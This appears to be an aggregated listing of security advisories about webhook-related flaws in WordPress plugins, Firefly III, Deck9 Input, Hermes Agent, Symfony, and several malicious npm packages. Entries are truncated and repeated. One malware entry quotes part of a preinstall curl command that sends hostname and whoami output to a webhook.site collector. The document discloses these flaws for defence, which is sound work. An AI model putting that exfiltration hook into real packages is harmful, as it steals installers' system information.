CVE-2026-11395 CF7 to Webhook <= 5.0.0 - Unauthenticated Server-Side Request Forgery via CF7 Field Placeholder in Webhook URL Host

The CF7 to Webhook plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.0 via the pullthetrigger. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be...

CVE-2026-11395

The CF7 to Webhook plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.0 via the pullthetrigger. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be...

CVE-2026-12093

The Simple Membership plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.7.5. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to deactivate arbitra...

EUVD-2026-37847

The Simple Membership plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.7.5. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to deactivate arbitra...

CVE-2026-12093 Simple Membership <= 4.7.5 - Missing Authorization to Unauthenticated Arbitrary Member Account Deactivation via Forged Stripe 'charge.refunded' Webhook

The Simple Membership plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.7.5. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to deactivate arbitra...

CVE-2026-12093

The CVE-2026-12093 entry concerns the WordPress Simple Membership plugin (versions up to and including 4.7.5). The root cause is missing authorization verification, enabling unauthenticated attackers to deactivate arbitrary member accounts by forging a charge.refunded Stripe webhook with a victim...

CVE-2026-53870

Hermes Agent before 0.16.0 creates responsestore.db and webhooksubscriptions.json with world-readable permissions mode 0o644, exposing conversation history and HMAC secrets to local users. Attackers with local filesystem access can read these files directly to obtain sensitive data including...

MAL-2026-5856 Malicious code in carousel-controller-mixin (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c1a4b1be297682ca77d8a92fc502887ee6d718a5541fa88413acdc6accb3ed97 package.json declares both preinstall and postinstall hooks that execute callback.js on every install. callback.js collects username, uid, hostname,...

Malicious code in carousel-controller-mixin (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c1a4b1be297682ca77d8a92fc502887ee6d718a5541fa88413acdc6accb3ed97 package.json declares both preinstall and postinstall hooks that execute callback.js on every install. callback.js collects username, uid, hostname,...

MAL-2026-5859 Malicious code in setka-editor (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a9dd5cda5d5a0925c139a36f0ea4c69b96052ff203d7dc365ac119408ba76069 package.json registers both preinstall and postinstall lifecycle hooks that run node callback.js, which executes automatically on npm install...

Malicious code in setka-editor (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a9dd5cda5d5a0925c139a36f0ea4c69b96052ff203d7dc365ac119408ba76069 package.json registers both preinstall and postinstall lifecycle hooks that run node callback.js, which executes automatically on npm install...

EUVD-2026-36784

Incorrect access control in the webhook management component of Project Firefly III v6.5.9 allows attackers to scan internal resources via a crafted POST request...

EUVD-2026-36773

Incorrect access control in the /form/webhooks/webhook endpoint of Deck9 Input v2.0.1 allows authenticated attackers to arbitrarily modify or delete another tenant's webhook via a crafted request...

CVE-2026-50886

Incorrect access control in the webhook management component of Project Firefly III v6.5.9 allows attackers to scan internal resources via a crafted POST request...

CVE-2026-50875

Incorrect access control in the /form/webhooks/webhook endpoint of Deck9 Input v2.0.1 allows authenticated attackers to arbitrarily modify or delete another tenant's webhook via a crafted request...

Malicious code in yunxin-overmind-comment (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57551a10d99024d1d12c7f2e349e6557613ed3a5e036bf45d71129d501fbbabc On npm install, the package's scripts.postinstall runs src/postinstall.js, which spawns a detached Node child that collects the installer's hostname,...

MAL-2026-5833 Malicious code in yunxin-overmind-comment (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57551a10d99024d1d12c7f2e349e6557613ed3a5e036bf45d71129d501fbbabc On npm install, the package's scripts.postinstall runs src/postinstall.js, which spawns a detached Node child that collects the installer's hostname,...

Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

MAL-2026-5826 Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

GHSA-RRJ9-5Q2J-4GVR Symfony: Mailomat Mailer Webhook Parser Reads the HMAC Algorithm from the Request: Signature Algorithm Downgrade

Description Symfony\Component\Mailer\Bridge\Mailomat\Webhook\MailomatRequestParser::validateSignature parses the X-MOM-Webhook-Signature request header as algo=signature and passes the wire-supplied $algo directly to hashhmac when verifying the request against the configured webhook secret. The...